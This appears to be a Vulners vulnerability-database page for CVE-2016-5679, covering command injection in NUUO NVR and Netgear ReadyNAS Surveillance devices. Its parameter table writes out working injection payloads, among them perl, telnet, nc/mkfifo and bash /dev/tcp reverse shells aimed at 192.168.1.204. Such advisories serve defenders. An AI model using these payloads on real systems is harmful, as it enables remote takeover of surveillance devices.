Vulners
Lucene search
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vul | 5 Aug 201600:00 | – | zdt |
 | CVE-2016-5679 | 8 Jan 202013:22 | – | circl |
 | NUUO NVRmini 2 and NetGear ReadyNAS Surveillance OS Command Injection Vulnerability | 14 Aug 201600:00 | – | cnvd |
 | CVE-2016-5679 | 31 Aug 201615:00 | – | cvelist |
 | EUVD-2016-6623 | 31 Aug 201615:00 | – | euvd |
 | NUUO NVRmini2 NVRsolo Crystal Devices NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities | 5 Aug 201600:00 | – | exploitpack |
 | CVE-2016-5679 | 31 Aug 201615:59 | – | nvd |
 | NUUO NVRmini 2 <= 3.0.8 Multiple Vulnerabilities - Active Check | 23 Aug 201600:00 | – | openvas |
 | CVE-2016-5679 | 31 Aug 201615:59 | – | osv |
 | NUUO NVRmini2 / NVRsolo / Crystal And NETGEAR ReadyNAS Code Execution | 4 Aug 201600:00 | – | packetstorm |
10
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/92318 |
| exploit-db | www.exploit-db.com/exploits/40200/ |
| kb | www.kb.cert.org/vuls/id/856152 |
| Parameter | Position | Path | Description | CWE |
|---|---|---|---|---|
| sn | query param | cgi-bin/cgi_main?cmd=transfer_license&method=offline&sn=";<command>;# | Command injection in transfer_license sn parameter (local/remote RCE) | CWE-78 |
| cmd | query param | cgi-bin/cgi_system?cmd=loaddefconfig | Administrator password reset via cgi_system command execution | CWE-78 |
| log | query param | __debugging_center_utils___.php?log=something%3bperl+-MIO%3a%3aSocket+-e+'$p%3dfork%3bexit,if($p)%3b$c%3dnew+IO%3a%3aSocket%3a%3aINET(PeerAddr,"192.168.1.204%3a9000")%3bSTDIN->fdopen($c,r)%3b$~->fdopen($c,w)%3bsystem$_+while<>%3b' | Information disclosure / remote code execution via debug center utility (log parameter) | CWE-78 |
| log | query param | __debugging_center_utils___.php?log=something%3btelnet+192.168.1.204+9999+|+bash+|+telnet+192.168.1.204+9998 | Command execution via log parameter enabling shells | CWE-78 |
| NTPServer | query param | handle_daylightsaving.php?act=update&NTPServer=bla%3b+whoami+>+/tmp/test | Command execution via NTPServer parameter (ntpdate) | CWE-78 |
| NTPServer | query param | handle_daylightsaving.php?act=update&NTPServer=bla%3brm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.1.204+9000+>/tmp/f | Command injection to spawn shells via NTPServer parameter | CWE-78 |
| NTPServer | query param | handle_daylightsaving.php?act=update&NTPServer=bla%3bbash+-i+>%26+/dev/tcp/192.168.1.204/4444+0>%26 | Remote code execution via NTPServer parameter to get a shell | CWE-78 |
| username | request body | POST /__nvr_status___.php | Information disclosure: exposes system processes/memory/filesystem via __nvr_status___.php | CWE-78 |
| password | request body | POST /__nvr_status___.php | Information disclosure: exposes system processes/memory/filesystem via __nvr_status___.php | CWE-78 |
| username | request body | POST /__nvr_status___.php | Information disclosure via posting credentials to status page | CWE-78 |
10
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jun 2026 00:49Current
8High risk
Vulners AI Score8
CVSS 38.8
CVSS 29
EPSS0.14119